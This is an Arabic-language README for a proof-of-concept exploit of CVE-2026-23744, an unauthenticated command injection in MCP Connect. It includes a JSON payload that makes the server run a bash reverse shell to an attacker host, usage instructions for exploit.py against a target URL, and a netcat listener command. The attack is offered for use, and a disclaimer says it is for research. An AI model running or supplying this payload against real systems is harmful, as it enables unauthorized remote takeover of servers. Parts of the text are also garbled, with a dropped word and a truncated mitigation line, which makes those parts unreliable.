
إثبات مفهوم لاستغلال CVE-2026-23744، وهو حقن أوامر غير مصادق عليه في MCP Connect يؤدي إلى تنفيذ تعليمات برمجية عن بُعد وفتح قشرة عكسية.
⚠️ إخلاء مسؤولية: هذا المستودع مخصص لأغراض تعليمية وبحثية في مجال الأمن فقط. استخدام هذا الاستغلال ضد أنظمة دون إذن صريح يعد غير قانوني. لا يتحمل المؤلف أي مسؤولية عن سوء استخدام هذا الكود.
تقع الثغرة في نقطة النهاية /api/mcp/connect، والتي تسمح لمهاجم غير مصادق عليه بتسجيل خادم MCP (بروتوكول سياق النموذج) عشوائي مع إعدادات خبيثة. نظرًا لعدم وجود تحقق أو تنقية لحقل command ووسائطه args، فمن الممكن حقن أوامر نظام التشغيل التي يتم تنفيذها مباشرة على الخادم بصلاحيات عملية الويب.
يؤدي هذا إلى تنفيذ كود عن بُعد (RCE) يمكن استغلاله للحصول على على النظام المخترق.
| الحقل | التفاصيل |
|---|---|
| النوع | تنفيذ كود عن بُعد (RCE) |
| الناقل | شبكة (HTTP POST بدون مصادقة) |
| نقطة النهاية | /api/mcp/connect |
| الخطورة | 🔴 حرجة |
| المصادقة | غير مطلوبة |
| التأثير | سيطرة كاملة على الخادم |
{
"serverId": "shell1",
"serverConfig": {
"command": "bash",
"args": ["-c", "bash -i >& /dev/tcp/<LHOST>/443 0>&1"],
"env": {}
}
}
يعالج الخادم هذا الإعداد ويستدعي الأمر bash مع الوسائط المقدمة، مما ينشئ اتصال TCP عكسيًا نحو المهاجم.
pip install requests termcolor
python3 exploit.py -l <عنوان_IP_الخاص_بك> -u <عنوان_URL_الهدف>
| المعامل | الوصف | مثال |
|---|---|---|
-l | عنوان IP الخاص بك (حيث ستستقبل القشرة) | 192.168.1.50 |
-u | عنوان URL الأساسي للهدف | https://victim.com |
الطرفية 1 — المستمع:
nc -nlvp 443
الطرفية 2 — الاستغلال:
python3 exploit.py -l 192.168.1.50 -u https://victim.com
[-] Please, execute the following command in another terminal:
[+] nc -nlvp 443
[-] Press 'Enter' when the command has been executed...
[+] Sending attack request...
بمجرد إرسال الطلب، سيستقبل المستمع على المنفذ 443 الاتصال العكسي مع قشرة تفاعلية من الخادم المخترق.
/api/mcp/connect قبل معالجتها..
├── exploit.py # السكربت الرئيسي للاستغلال
└── README.md # هذا الملف
تم تطويره لأغراض البحث في الأمن الهجومي بواسطة Jorge Arana Fedriani.